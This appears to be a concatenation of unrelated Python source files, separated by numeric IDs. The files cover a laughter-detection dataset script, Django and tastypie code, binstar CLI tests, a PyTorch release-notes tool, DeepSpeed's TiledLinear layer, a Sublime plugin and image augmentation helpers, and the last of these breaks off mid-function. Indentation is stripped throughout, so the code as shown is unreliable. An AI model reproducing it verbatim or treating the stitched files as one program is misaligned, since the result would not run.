all_buffers = beginning_buffers + end_buffers
time_to_reduce_per_buffer = distribute_time(time_to_reduce, all_buffers)
beginning_buffer_updates, end_buffer_updates = np.split(time_to_reduce_per_buffer,2)
try:
for i, clip in enumerate(all_clips):
assert(clip['beginning_buffer'] >= 0)
assert(clip['end_buffer'] >= 0)
except:
pass
#import pdb; pdb.set_trace()
try:
assert(len(beginning_buffer_updates) == len(all_clips))
assert(len(end_buffer_updates) == len(all_clips))
except:
pass
#import pdb; pdb.set_trace()
for i, clip in enumerate(all_clips):
clip['window'][0] += beginning_buffer_updates[i]; clip['beginning_space'] += beginning_buffer_updates[i]
clip['beginning_buffer'] -= beginning_buffer_updates[i]
clip['window'][1] -= end_buffer_updates[i]; clip['end_space'] += end_buffer_updates[i]
clip['end_buffer'] -= end_buffer_updates[i]
if clip['beginning_buffer'] < 0 and clip['beginning_buffer'] > -0.1: clip['beginning_buffer']=0.
if clip['end_buffer'] < 0 and clip['end_buffer'] > -0.1: clip['end_buffer']=0.
try:
assert(clip['beginning_buffer'] >= 0)
assert(clip['end_buffer'] >= 0)
except:
pass
#import pdb; pdb.set_trace()
# 6th pass: Re-Compute the class-balance (laughter fraction) for this conversation
total_window_time = sum([clip['window'][1] - clip['window'][0] for clip in all_clips])
total_laughter_time = sum([region[1] for region in regions_list])
swb_laughter_fraction = total_laughter_time / total_window_time
intended_window_time = total_laughter_time/audioset_laughter_fraction
# Now make the dataframe
rows = []
# For each window, grab each laughter region that's inside it and mark that relative to the window start
for i, clip in enumerate(all_clips):
inside_regions = [r for r in regions_list if audio_utils.times_overlap(
clip['window'][0], clip['window'][1],r[0],r[0]+r[1])]
if len(inside_regions) > 5:
pass
#import pdb; pdb.set_trace()
h = {'FileID': audio_file_path.split('/')[-1].split('.')[0],
'audio_path': audio_file_path,
'audio_length': full_audio_file_length,
'window_start': clip['window'][0],
'window_length': clip['window'][1]-clip['window'][0]
}
for j in range(5):
if j == 0:
start_key = 'Start'; end_key = 'End'
else:
start_key = f'Start.{j}'; end_key = f'End.{j}'
if len(inside_regions) > j:
r = inside_regions[j]
h[start_key] = r[0]; h[end_key] = r[0] + r[1]
else:
h[start_key] = np.nan; h[end_key] = np.nan
if h['window_length'] > 1.:
rows.append(h)
return rows, all_clips, total_laughter_time, total_window_time
def make_switchboard_dataframe(t_files_A, t_files_B, a_files, adjustment_amount=0,include_words=False):
all_rows = []; all_clips = []; all_laughter_time = []; all_window_time = []
all_laughter_regions = []
for index in tqdm(range(len(a_files))):
full_audio_file_length = get_audio_file_length(a_files[index])
laughter_regions, speech_regions, _, _ = dataset_utils.get_laughter_regions_and_speech_regions(
t_files_A[index], t_files_B[index], a_files[index], include_words=include_words)
all_laughter_regions.append(laughter_regions)
rows, clips, laughter_time, window_time = get_10_second_clips(
laughter_regions, a_files[index],full_audio_file_length,
index, audioset_laughter_fraction, adjustment_amount=adjustment_amount)
all_rows += rows
all_clips.append(clips)
all_laughter_time.append(laughter_time)
all_window_time.append(window_time)
total_laughter_time = sum(all_laughter_time)
total_window_time = sum(all_window_time)
df = pd.DataFrame(all_rows)
return df
def make_switchboard_distractor_dataframe(t_files_A, t_files_B, a_files, total_distractor_clips=None):
rows = []
for i in tqdm(range(len(t_files_A))):
t_file_A = t_files_A[i]
t_file_B = t_files_B[i]
a_file = a_files[i]
full_audio_file_length = get_audio_file_length(a_file)
laughter_regions, _, _, _ = dataset_utils.get_laughter_regions_and_speech_regions(
t_file_A, t_file_B, a_file, include_words=True)
laughter_regions = [{'start':r[0], 'end':r[0]+r[1]} for r in laughter_regions]
non_laughter_regions = get_non_laughter_times(laughter_regions, 0,
full_audio_file_length, avoid_edges=True, edge_gap=0.5)
for r in non_laughter_regions:
if r['end'] - r['start'] > 10:
start_point = r['start'] + (r['end']-r['start']-10)/2
end_point = start_point + 10
h = {'FileID': a_file.split('/')[-1].split('.')[0],
'audio_path': a_file,
'audio_length': full_audio_file_length,
'window_start': start_point,
'window_length': 10.
}
for j in range(5):
if j == 0:
start_key = 'Start'; end_key = 'End'
else:
start_key = f'Start.{j}'; end_key = f'End.{j}'
h[start_key] = np.nan; h[end_key] = np.nan
rows.append(h)
if total_distractor_clips is not None:
rows = rows[0:total_distractor_clips]
return pd.DataFrame(rows)
swb_val_distractor_df = make_switchboard_distractor_dataframe(
val_transcription_files_A, val_transcription_files_B, val_audio_files, total_distractor_clips=153)
swb_val_distractor_df.to_csv('../data/switchboard/annotations/clean_switchboard_val_distractor_annotations.csv', index=None)
swb_test_distractor_df = make_switchboard_distractor_dataframe(
test_transcription_files_A, test_transcription_files_B, test_audio_files, total_distractor_clips=203)
swb_test_distractor_df.to_csv('../data/switchboard/annotations/clean_switchboard_test_distractor_annotations.csv', index=None)
swb_train_df = make_switchboard_dataframe(
train_transcription_files_A, train_transcription_files_B, train_audio_files, adjustment_amount=-1.1)
print("\nSWB Train Annotations stats:")
_, _, _, _, _ = get_annotation_stats(
swb_train_df, display=True, min_gap = MIN_GAP, avoid_edges=True, edge_gap=0.5)
swb_train_df.to_csv('../data/switchboard/annotations/clean_switchboard_train_laughter_annotations.csv', index=None)
swb_val_df = make_switchboard_dataframe(
val_transcription_files_A, val_transcription_files_B, val_audio_files, adjustment_amount=-1.1)
print("\nSWB Val Set Annotations stats:")
_, _, _, _, _ = get_annotation_stats(
swb_val_df, display=True, min_gap = MIN_GAP, avoid_edges=True, edge_gap=0.5)
swb_val_df.to_csv('../data/switchboard/annotations/clean_switchboard_val_laughter_annotations.csv', index=None)
swb_test_df = make_switchboard_dataframe(
test_transcription_files_A, test_transcription_files_B, test_audio_files, adjustment_amount=1.2)
print("\nSWB Test Set Annotations stats:")
_, _, _, _, _ = get_annotation_stats(
swb_test_df, display=True, min_gap = MIN_GAP, avoid_edges=True, edge_gap=0.5)
swb_test_df.to_csv('../data/switchboard/annotations/clean_switchboard_test_laughter_annotations.csv', index=None)
|
412999
|
from tastypie.api import Api
from django.conf.urls import patterns, include, url
from bikecompetition.bc import api, actions
bc_api = Api(api_name='bc')
bc_api.register(api.CompetitionResource())
bc_api.register(api.CompetitorResource())
urlpatterns = patterns('',
url(r'^api/', include(bc_api.urls)),
url(r'^api/action/get_competitor/', actions.get_competitor),
url(r'^api/action/get_competition/', actions.get_competition),
url(r'^api/action/update_competition/', actions.update_competition),
url(r'^api/action/finish_competition/', actions.finish_competition),
url(r'^api/bc/doc/',
include('tastypie_swagger.urls', namespace='tastypie_swagger')),
)
|
413057
|
def convert_sample_to_shot_coQA(sample, with_knowledge=None):
prefix = f"{sample['meta']}\n"
for turn in sample["dialogue"]:
prefix += f"Q: {turn[0]}" +"\n"
if turn[1] == "":
prefix += f"A:"
return prefix
else:
prefix += f"A: {turn[1]}" +"\n"
return prefix
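# A minimal, self-contained usage sketch (added for illustration; assumes `meta`
# holds the story text and `dialogue` is a list of [question, answer] pairs, with an
# empty answer marking the turn to be completed):
if __name__ == "__main__":
    sample = {
        "meta": "Alice went to the market.",
        "dialogue": [["Who went to the market?", "Alice"], ["Where did she go?", ""]],
    }
    print(convert_sample_to_shot_coQA(sample))
    # Alice went to the market.
    # Q: Who went to the market?
    # A: Alice
    # Q: Where did she go?
    # A: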
|
413067
|
import unittest
from binstar_client.tests.fixture import CLITestCase
from binstar_client.tests.urlmock import urlpatch
from binstar_client.scripts.cli import main
from binstar_client import errors
class Test(CLITestCase):
@urlpatch
def test_show(self, urls):
urls.register(
method='GET',
path='/groups/org',
content='{"groups": [{"name":"grp", "permission": "read"}]}',
)
main(['--show-traceback', 'groups', 'show', 'org'], False)
urls.assertAllCalled()
@urlpatch
def test_show_group(self, urls):
urls.register(
method='GET',
path='/group/org/owners',
content='{"name": "owners", "permission": "read", "members_count": 1, "repos_count": 1}',
)
main(['--show-traceback', 'groups', 'show', 'org/owners'], False)
urls.assertAllCalled()
@urlpatch
def test_create(self, urls):
urls.register(
method='POST',
path='/group/org/new_grp',
status=204,
)
main(['--show-traceback', 'groups', 'add', 'org/new_grp'], False)
urls.assertAllCalled()
@urlpatch
def test_create_missing_group(self, urls):
with self.assertRaisesRegexp(errors.UserError, 'Group name not given'):
main(['--show-traceback', 'groups', 'add', 'org'], False)
@urlpatch
def test_add_member(self, urls):
urls.register(
method='PUT',
path='/group/org/grp/members/new_member',
status=204,
)
main(['--show-traceback', 'groups', 'add_member', 'org/grp/new_member'], False)
urls.assertAllCalled()
@urlpatch
def test_add_member_missing_member(self, urls):
with self.assertRaisesRegexp(errors.UserError, 'Member name not given'):
main(['--show-traceback', 'groups', 'add_member', 'org/grp'], False)
@urlpatch
def test_remove_member(self, urls):
urls.register(
method='DELETE',
path='/group/org/grp/members/new_member',
status=204,
)
main(['--show-traceback', 'groups', 'remove_member', 'org/grp/new_member'], False)
urls.assertAllCalled()
@urlpatch
def test_packages(self, urls):
urls.register(
method='GET',
path='/group/org/grp/packages',
content='[{"name": "pkg", "full_name": "org/pkg", "summary": "An org pkg"}]'
)
main(['--show-traceback', 'groups', 'packages', 'org/grp'], False)
urls.assertAllCalled()
@urlpatch
def test_add_package(self, urls):
urls.register(
method='PUT',
path='/group/org/grp/packages/pkg',
status=204,
)
main(['--show-traceback', 'groups', 'add_package', 'org/grp/pkg'], False)
urls.assertAllCalled()
@urlpatch
def test_remove_package(self, urls):
urls.register(
method='DELETE',
path='/group/org/grp/packages/pkg',
status=204,
)
main(['--show-traceback', 'groups', 'remove_package', 'org/grp/pkg'], False)
urls.assertAllCalled()
if __name__ == "__main__":
unittest.main()
|
413087
|
def ensureUtf(s, encoding='utf8'):
"""Converts input to unicode if necessary.
If `s` is bytes, it will be decoded using the `encoding` parameters.
This function is used for preprocessing /source/ and /filename/ arguments
to the builtin function `compile`.
"""
# In Python2, str == bytes.
# In Python3, bytes remains unchanged, but str means unicode
# while unicode is not defined anymore
if type(s) == bytes:
return s.decode(encoding, 'ignore')
else:
return s
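# Example (illustrative): ensureUtf(b'caf\xc3\xa9') returns u'café', while input
# that is already unicode/str is returned unchanged.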
|
413105
|
import time
from pyrunner import Worker
class SayHello(Worker):
def run(self):
self.logger.info('Hello World!')
return
class FailMe(Worker):
def run(self):
return 1
|
413144
|
import gobject
import numpy as np
import matplotlib
matplotlib.use('GTKAgg')
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
line, = ax.plot(np.random.rand(10))
ax.set_ylim(0, 1)
def update():
line.set_ydata(np.random.rand(10))
fig.canvas.draw_idle()
return True # return False to terminate the updates
gobject.timeout_add(100, update) # you can also use idle_add to update when gtk is idle
plt.show()
|
413165
|
import argparse
from common import run, topics
from collections import defaultdict
import os
import csv
import pprint
from common import CommitDataCache
import re
"""
Example Usages
Create a new commitlist for consumption by categorize.py.
Said commitlist contains commits between v1.5.0 and f5bc91f851.
python commitlist.py --create_new tags/v1.5.0 f5bc91f851
Update the existing commitlist to commit bfcb687b9c.
python commitlist.py --update_to bfcb687b9c
"""
class Commit:
def __init__(self, commit_hash, category, topic, title):
self.commit_hash = commit_hash
self.category = category
self.topic = topic
self.title = title
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.commit_hash == other.commit_hash and \
self.category == other.category and \
self.topic == other.topic and \
self.title == other.title
def __repr__(self):
return f'Commit({self.commit_hash}, {self.category}, {self.topic}, {self.title})'
class CommitList:
# NB: Private ctor. Use `from_existing` or `create_new`.
def __init__(self, path, commits):
self.path = path
self.commits = commits
@staticmethod
def from_existing(path):
commits = CommitList.read_from_disk(path)
return CommitList(path, commits)
@staticmethod
def create_new(path, base_version, new_version):
if os.path.exists(path):
raise ValueError('Attempted to create a new commitlist but one exists already!')
commits = CommitList.get_commits_between(base_version, new_version)
return CommitList(path, commits)
@staticmethod
def read_from_disk(path):
with open(path) as csvfile:
reader = csv.reader(csvfile)
rows = list(row for row in reader)
assert all(len(row) >= 4 for row in rows)
return [Commit(*row[:4]) for row in rows]
def write_to_disk(self):
path = self.path
rows = self.commits
with open(path, 'w') as csvfile:
writer = csv.writer(csvfile)
for commit in rows:
writer.writerow([commit.commit_hash, commit.category, commit.topic, commit.title])
@staticmethod
def get_commits_between(base_version, new_version):
cmd = f'git merge-base {base_version} {new_version}'
rc, merge_base, _ = run(cmd)
assert rc == 0
# Returns a list of something like
# b33e38ec47 Allow a higher-precision step type for Vec256::arange (#34555)
cmd = f'git log --reverse --oneline {merge_base}..{new_version}'
rc, commits, _ = run(cmd)
assert rc == 0
log_lines = commits.split('\n')
hashes, titles = zip(*[log_line.split(' ', 1) for log_line in log_lines])
return [Commit(commit_hash, 'Uncategorized', 'Untopiced', title) for commit_hash, title in zip(hashes, titles)]
def filter(self, *, category=None, topic=None):
commits = self.commits
if category is not None:
commits = [commit for commit in commits if commit.category == category]
if topic is not None:
commits = [commit for commit in commits if commit.topic == topic]
return commits
def update_to(self, new_version):
last_hash = self.commits[-1].commit_hash
new_commits = CommitList.get_commits_between(last_hash, new_version)
self.commits += new_commits
def stat(self):
counts = defaultdict(lambda: defaultdict(int))
for commit in self.commits:
counts[commit.category][commit.topic] += 1
return counts
def create_new(path, base_version, new_version):
commits = CommitList.create_new(path, base_version, new_version)
commits.write_to_disk()
def update_existing(path, new_version):
commits = CommitList.from_existing(path)
commits.update_to(new_version)
commits.write_to_disk()
def to_markdown(commit_list, category):
def cleanup_title(commit):
match = re.match(r'(.*) \(#\d+\)', commit.title)
if match is None:
return commit.title
return match.group(1)
cdc = CommitDataCache()
lines = [f'\n## {category}\n']
for topic in topics:
lines.append(f'### {topic}\n')
commits = commit_list.filter(category=category, topic=topic)
for commit in commits:
result = cleanup_title(commit)
maybe_pr_number = cdc.get(commit.commit_hash).pr_number
if maybe_pr_number is None:
result = f'- {result} ({commit.commit_hash})\n'
else:
result = f'- {result} ([#{maybe_pr_number}](https://github.com/pytorch/pytorch/pull/{maybe_pr_number}))\n'
lines.append(result)
return lines
def get_markdown_header(category):
header = f"""
# Release Notes worksheet {category}
The main goal of this process is to rephrase all the commit messages below to make them clear and easy to read by the end user. You should follow the following instructions to do so:
* **Please clean up and format commit titles to be readable by the general pytorch user.** [Detailed instructions here](https://fb.quip.com/OCRoAbEvrRD9#HdaACARZZvo)
* Please sort commits into the following categories (you should not rename the categories!). I tried to pre-sort these to ease your work; feel free to move commits around if the current categorization is not good.
* Please drop any commits that are not user-facing.
* If anything is from another domain, leave it in the UNTOPICED section at the end and I'll come and take care of it.
The categories below are as follows:
* BC breaking: All commits that are BC-breaking. These are the most important commits. If any pre-sorted commit is actually BC-breaking, do move it to this section. Each commit should contain a paragraph explaining the rationale behind the change as well as an example for how to update user code (guidelines here: https://quip.com/OCRoAbEvrRD9)
* Deprecations: All commits introducing deprecation. Each commit should include a small example explaining what should be done to update user code.
* new_features: All commits introducing a new feature (new functions, new submodule, new supported platform etc)
* improvements: All commits providing improvements to existing feature should be here (new backend for a function, new argument, better numerical stability)
* bug fixes: All commits that fix bugs and behaviors that do not match the documentation
* performance: All commits that are added mainly for performance (we separate this from improvements above to make it easier for users to look for it)
* documentation: All commits that add/update documentation
* Developers: All commits that are not end-user facing but still impact people that compile from source, develop into pytorch, extend pytorch, etc
"""
return [header,]
def main():
parser = argparse.ArgumentParser(description='Tool to create a commit list')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--create_new', nargs=2)
group.add_argument('--update_to')
group.add_argument('--stat', action='store_true')
group.add_argument('--export_markdown', action='store_true')
parser.add_argument('--path', default='results/commitlist.csv')
args = parser.parse_args()
if args.create_new:
create_new(args.path, args.create_new[0], args.create_new[1])
return
if args.update_to:
update_existing(args.path, args.update_to)
return
if args.stat:
commits = CommitList.from_existing(args.path)
stats = commits.stat()
pprint.pprint(stats)
return
if args.export_markdown:
commits = CommitList.from_existing(args.path)
categories = list(commits.stat().keys())
for category in categories:
print(f"Exporting {category}...")
lines = get_markdown_header(category)
lines += to_markdown(commits, category)
filename = f'results/export/result_{category}.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
with open(filename, 'w') as f:
f.writelines(lines)
return
assert False
if __name__ == '__main__':
main()
|
413167
|
import torch
import deepspeed
from deepspeed.runtime.utils import partition_uniform as partition
def split_tensor_along_last_dim(tensor, partitions, contiguous_split_chunks=False):
"""Split a tensor along its last dimension. Adapted from Megatron-LM.
Arguments:
tensor: input tensor.
partitions: list of partition sizes to supply to torch.split
contiguous_split_chunks: If True, make each chunk contiguous
in memory.
"""
# Get the size and dimension.
last_dim = tensor.dim() - 1
# Split.
tensor_list = torch.split(tensor, partitions, dim=last_dim)
# Note: torch.split does not create contiguous tensors by default.
if contiguous_split_chunks:
return tuple(chunk.contiguous() for chunk in tensor_list)
return tensor_list
class TiledLinear(torch.nn.Module):
def __init__(self,
in_features,
out_features,
bias=True,
in_splits=1,
out_splits=1,
input_is_already_split=False,
combine_out_splits=True,
linear_cls=torch.nn.Linear,
init_linear=None,
**kwargs):
"""A replacement for ``torch.nn.Linear`` that works with ZeRO-3 to reduce
memory requirements via tiling.
TiledLinear breaks the input and output dimensions of a linear layer
into tiles that are processed in sequence. This class enables huge
linear layers when combined with ZeRO-3 because inactive tiles can be
partitioned and offloaded.
.. note::
We recommend using as few tiles as necessary. Tiling
significantly reduces memory usage, but can reduce throughput
            for inexpensive layers. This is due to the smaller kernels having
less parallelism and lower arithmetic intensity, while
introducing more frequent synchronization and communication.
Args:
in_features (int): See ``torch.nn.Linear``
out_features (int): See ``torch.nn.Linear``
bias (bool, optional): See ``torch.nn.Linear``
in_splits (int, optional): The number of tiles along the input dimension. Defaults to 1.
out_splits (int, optional): The number of tiles along the output dimension. Defaults to 1.
input_is_already_split (bool, optional): If set to ``True``, assume that the ``input_`` in
to ``forward()`` is already split into ``in_splits`` chunks. Defaults to ``False``.
combine_out_splits (bool, optional): If set to ``False``, do not combine the ``out_splits`` outputs
into a single tensor. Defaults to ``True``.
linear_cls (class, optional): The underlying class to build individual tiles.
Defaults to ``torch.nn.Linear``.
init_linear (``torch.nn.Linear``, optional): If set, copy the parameters of
``init_linear``. Useful for debugging. Defaults to ``None``.
kwargs (dict, optional): additional keyword arguments to provide to ``linear_cls()``.
Raises:
RuntimeError: ``in_splits`` must be within the range [1, in_features).
RuntimeError: ``out_splits`` must be within the range of [1, out_features).
"""
super().__init__()
if (in_splits < 1) or (in_splits > in_features):
raise RuntimeError('in splits must be in range [1, in_features].')
if (out_splits < 1) or (out_splits > out_features):
raise RuntimeError('out splits must be in range [1, out_features].')
# global, not necessarily local
self.in_features = in_features
self.out_features = out_features
self.use_bias = bias
self.out_splits = out_splits
self.in_splits = in_splits
self.input_is_already_split = input_is_already_split
self.combine_out_splits = combine_out_splits
# Build partition-lists. These are CSR-style splits [0, part0, part1, ..., features]
# For example, row_parts[p] gives the start of partition p and row_parts[p+1]
# is the exclusive end.
self.in_parts = partition(num_items=in_features, num_parts=in_splits)
self.out_parts = partition(num_items=out_features, num_parts=out_splits)
assert len(self.out_parts) == out_splits + 1
assert len(self.in_parts) == in_splits + 1
assert self.out_parts[0] == 0
assert self.out_parts[out_splits] == out_features
assert self.in_parts[in_splits] == in_features
self.linears = torch.nn.ModuleList()
for out_id in range(out_splits):
self.linears.append(torch.nn.ModuleList())
local_out_dim = self.out_parts[out_id + 1] - self.out_parts[out_id]
for in_id in range(in_splits):
#if input_size is split, we only need one bias
local_bias = bias if in_id == (in_splits - 1) else False
local_in_dim = self.in_parts[in_id + 1] - self.in_parts[in_id]
local = linear_cls(local_in_dim,
local_out_dim,
bias=local_bias,
**kwargs)
self.linears[out_id].append(local)
# Optionally initialize with a known tensor
if init_linear is not None:
self.copy_params_from(init_linear)
def forward(self, input_):
if self.in_splits > 1 and not self.input_is_already_split:
split_sizes = [
self.in_parts[p + 1] - self.in_parts[p] for p in range(self.in_splits)
]
inputs = self._split_global_input(input_, split_sizes)
elif self.in_splits > 1:
inputs = input_
assert len(inputs) == self.in_splits, f"Col splits {self.in_splits} does not match input splits {len(inputs)}"
else:
# no splits
inputs = [input_]
outputs = [None] * self.out_splits
for out_id in range(self.out_splits):
for in_id in range(self.in_splits):
local_output = self.linears[out_id][in_id](inputs[in_id])
outputs[out_id] = self._reduce_local_output(in_id=in_id,
out_id=out_id,
current_out=outputs[out_id],
new_out=local_output)
if self.combine_out_splits:
return self._combine_output_splits(outputs)
return outputs
def _split_global_input(self, input, split_sizes):
"""Partition an input tensor along the last dimension, aligned with given splits.
Subclasses should override this method to account for new input types.
Args:
            input (Tensor): The tensor to partition along the last dimension.
split_sizes (List[int]): The size of each partition.
Returns:
List[Any]: A list of the chunks of ``input``.
"""
return split_tensor_along_last_dim(input, split_sizes)
def _reduce_local_output(self, in_id, out_id, current_out, new_out):
"""Reduce (sum) a new local result into the existing local results.
Subclasses should override this method.
        For a given ``out_id``, this method is called once per input split; the first
        call (``in_id == 0``) is a simple assignment rather than a reduction.
Args:
in_id (int): The input split that produced ``new_out``.
out_id (int): The output split that produced ``new_out``.
current_out (Any): The reduced form of all previous ``out_id`` results.
            new_out (Any): The local result from forward (``in_id``, ``out_id``).
Returns:
Any: The combined result of ``current_out`` and ``new_out``.
"""
if current_out is None:
#this clone is necessary to preserve auto grad
#there is some issue with inplace update for outputs that are views
return new_out.clone()
else:
return current_out + new_out
def _combine_output_splits(self, outputs):
"""Join the splits of the output into a single result.
Args:
outputs (List[Any]): The reduced outputs for each output split.
Returns:
Any: The combined outputs.
"""
assert len(outputs) == self.out_splits
return torch.cat(outputs, dim=-1)
@torch.no_grad()
def copy_params_from(self, other):
"""Copy the weight and bias data from ``other``.
This is especially useful for reproducible initialization and testing.
Equivalent to:
.. code-block:: python
with torch.no_grad():
self.weight.copy_(other.weight)
if self.bias is not None:
self.bias.copy_(other.bias)
.. note::
If ZeRO-3 is enabled, this is a collective operation and the
updated parameters of data-parallel rank 0 will be visible on all
ranks. See :class:`deepspeed.zero.GatheredParameters` for more
information.
Args:
other (``torch.nn.Linear``): the linear layer to copy from.
"""
assert hasattr(other, 'weight')
assert other.weight.size() == (self.out_features, self.in_features)
if self.use_bias:
assert hasattr(other, 'bias')
assert other.bias is not None
assert other.bias.size() == (self.out_features, )
else:
assert other.bias is None
for row in range(self.out_splits):
rstart = self.out_parts[row]
rstop = self.out_parts[row + 1]
for col in range(self.in_splits):
cstart = self.in_parts[col]
cstop = self.in_parts[col + 1]
local = self.linears[row][col]
global_weight = other.weight[rstart:rstop, cstart:cstop]
with deepspeed.zero.GatheredParameters(local.weight, modifier_rank=0):
local.weight.copy_(global_weight)
if local.bias is not None:
with deepspeed.zero.GatheredParameters(local.bias, modifier_rank=0):
local.bias.data.copy_(other.bias[rstart:rstop].data)
class TiledLinearReturnBias(TiledLinear):
"""Wrapper for a Linear class that returns its own bias parameter, such as
used by Megatron-LM.
"""
def _reduce_local_output(self, in_id, out_id, current_out, new_out):
"""Reduces output tensors, but not the returned bias. """
if current_out is not None:
old_tensor, old_bias = current_out
else:
old_tensor, old_bias = None, None
assert isinstance(new_out, tuple)
assert len(new_out) == 2
tensor, bias = new_out
assert tensor is not None
tensor = super()._reduce_local_output(in_id=in_id,
out_id=out_id,
current_out=old_tensor,
new_out=tensor)
if bias is None:
bias = old_bias
return tensor, bias
def _combine_output_splits(self, outputs):
# stack output tensors
tensors = [o[0] for o in outputs]
tensor = super()._combine_output_splits(tensors)
# stack biases if applicable
biases = [o[1] for o in outputs if o[1] is not None]
if len(biases) > 0:
bias = super()._combine_output_splits(biases)
else:
bias = None
return tensor, bias
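if __name__ == "__main__":
    # Minimal usage sketch (illustrative): tile an 8x6 linear layer into 2 input
    # splits and 3 output splits and run a forward pass on CPU. Combined with
    # ZeRO-3, each of the six small tiles can be partitioned and offloaded
    # independently; here we only check that the combined output has the
    # expected shape.
    layer = TiledLinear(in_features=8, out_features=6, in_splits=2, out_splits=3)
    x = torch.randn(4, 8)
    y = layer(x)
    assert y.shape == (4, 6)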
|
413192
|
import sublime
import sublime_plugin
from .. import utils
class CfmlNavigateToMethodCommand(sublime_plugin.WindowCommand):
def run(self, file_path, href):
if len(file_path) > 0:
index_locations = self.window.lookup_symbol_in_index(href)
for full_path, project_path, rowcol in index_locations:
if utils.format_lookup_file_path(full_path) == file_path:
row, col = rowcol
self.window.open_file(full_path + ":" + str(row) + ":" + str(col), sublime.ENCODED_POSITION | sublime.FORCE_GROUP)
break
else:
# might be a setter, so for now just open the file
self.window.open_file(file_path)
else:
# this symbol should be in active view
view = self.window.active_view()
functions = view.find_by_selector("meta.function.declaration.cfml entity.name.function.cfml")
for funct_region in functions:
if view.substr(funct_region).lower() == href.lower():
view.sel().clear()
r = sublime.Region(funct_region.begin())
view.sel().add(r)
view.show(r)
break
|
413200
|
class NullLogger:
level_name = None
def remove(self, handler_id=None): # pragma: no cover
pass
def add(self, sink, **kwargs): # pragma: no cover
pass
def disable(self, name): # pragma: no cover
pass
def enable(self, name): # pragma: no cover
pass
def critical(self, __message, *args, **kwargs): # pragma: no cover
pass
def debug(self, __message, *args, **kwargs): # pragma: no cover
pass
def error(self, __message, *args, **kwargs): # pragma: no cover
pass
def exception(self, __message, *args, **kwargs): # pragma: no cover
pass
def info(self, __message, *args, **kwargs): # pragma: no cover
pass
def log(self, __level, __message, *args, **kwargs): # pragma: no cover
pass
def success(self, __message, *args, **kwargs): # pragma: no cover
pass
def trace(self, __message, *args, **kwargs): # pragma: no cover
pass
def warning(self, __message, *args, **kwargs): # pragma: no cover
pass
|
413205
|
import csv, json
def jsonFromCsv(csvFilePath, jsonFilePath):
# JSON objects
jsonData = {}
trialNums = {}
aimingLandmarks = {}
onlineFB = {}
endpointFB = {}
rotation = {}
clampedFB = {}
tgtDistance = {}
anglesDict = {}
betweenBlocks = {}
targetJump = {}
file = open(csvFilePath, 'r')
reader = csv.reader(file)
headings = next(reader) # Ensures we don't read the headings again
rowCount = 0
for row in reader:
trialNums[rowCount] = int(row[0])
aimingLandmarks[rowCount] = int(row[1])
anglesDict[rowCount] = int(row[2])
rotation[rowCount] = float(row[3])
onlineFB[rowCount] = int(row[4])
endpointFB[rowCount] = int(row[5])
clampedFB[rowCount] = float(row[6])
tgtDistance[rowCount] = int(row[7])
betweenBlocks[rowCount] = float(row[8])
targetJump[rowCount] = float(row[9])
rowCount += 1
file.close()
jsonData["numtrials"] = rowCount
jsonData["trialnum"] = trialNums
jsonData["aiming_landmarks"] = aimingLandmarks
jsonData["online_fb"] = onlineFB
jsonData["endpoint_feedback"] = endpointFB
jsonData["rotation"] = rotation
jsonData["clamped_fb"] = clampedFB
jsonData["tgt_angle"] = anglesDict
jsonData["tgt_distance"] = tgtDistance
jsonData["between_blocks"] = betweenBlocks
jsonData["target_jump"] = targetJump
for key in jsonData.keys():
print ("key: ", key)
print ("value: ", jsonData[key])
print ("")
with open(jsonFilePath, 'w') as outfile:
json.dump(jsonData, outfile)
"""
Please reference 'tbt_tgtfile_04272020_V2.csv' for how csv files should be formatted.
"""
csvFilePath = '../csv_tgt_files/multiclamp_demo_csv_file.csv'
jsonFilePath = '../public/tgt_files/multiclamp_demo.json'
jsonFromCsv(csvFilePath, jsonFilePath)
|
413215
|
from django.core.management.base import BaseCommand
from django.db.models import Q
from clubs.models import Club
class Command(BaseCommand):
help = (
"Set emails for all active clubs that do not have an email set. "
"Mark newly set emails as private. "
"Use the officer email if it exists."
)
def handle(self, *args, **kwargs):
for club in Club.objects.filter(
Q(active=True) & (Q(email="") | Q(email__isnull=True))
):
mship = (
club.membership_set.filter(~Q(person__email=""))
.order_by("role", "created_at")
.first()
)
if mship is not None:
email = mship.person.email
club.email = email
club.email_public = False
club._change_reason = "Add email to contact field"
club.save(update_fields=["email", "email_public"])
self.stdout.write(f"Added email {email} to {club.name}!")
else:
self.stdout.write(f"Could not add email to {club.name}!")
|
413225
|
import cv2
import numpy as np
from IPython.core.debugger import Tracer; keyboard = Tracer()
from scipy.interpolate import UnivariateSpline
def create_LUT_8UC1(x, y):
spl = UnivariateSpline(x, y,k=2)
    return spl(range(256))
def _get_images_from_batches(batch):
batch_size = batch.shape[0]
img_width = batch.shape[1]
img_height = batch.shape[2]
img_channel = batch.shape[3]
imgs = np.split(batch,batch_size)
reshaped_imgs = []
for img in imgs:
img = img.reshape(img_width,img_height,img_channel)
reshaped_imgs.append(img)
return reshaped_imgs,img_width,img_height,img_channel
def trans2uint(batch):
batch = np.interp(batch,[0,1],[0,255])
batch = np.ndarray.astype(batch,'uint8')
return batch
def trans2float(batch):
batch = np.interp(batch,[0,255],[0,1])
batch = np.ndarray.astype(batch,'float64')
return batch
def add_noise_batch(batch,level):
noiselevel = np.sqrt(level)
gaussian_noise = np.random.normal(0,noiselevel,size = np.shape(batch))
noisy_batch = batch+gaussian_noise
noisy_batch = np.clip(noisy_batch,0.0,1.0)
return noisy_batch
def adjust_gamma_batch(batch,gammalevel=(1,3)):
imgs,_,_,_ = _get_images_from_batches(batch)
gammaed_imgs=[]
for img in imgs:
gamma = np.random.uniform(gammalevel[0],gammalevel[1])
gammaed_imgs.append(_adjusting_gamma(img,gamma))
batch = np.array(gammaed_imgs)
return batch
def apply_blur_batch(batch,kernelmax):
imgs,_,_,_ = _get_images_from_batches(batch)
blur_imgs = []
for img in imgs:
kernel = np.random.randint(int(kernelmax))
if kernel == 0:
blur_imgs.append(img)
else:
blur_imgs.append(_apply_blur(img,kernel))
batch = np.array(blur_imgs)
return batch
def adjust_saturation_batch(batch,valuelevel=0.2):
imgs,_,_,_ = _get_images_from_batches(batch)
saturated_imgs = []
for img in imgs:
value = np.random.uniform((1/(1+valuelevel)),1+valuelevel)
saturated_imgs.append(_adjusting_saturation(img,value))
batch = np.array(saturated_imgs)
return batch
def adjust_exposure_batch(batch,valuelevel=0.2):
imgs,_,_,_ = _get_images_from_batches(batch)
exposure_imgs = []
for img in imgs:
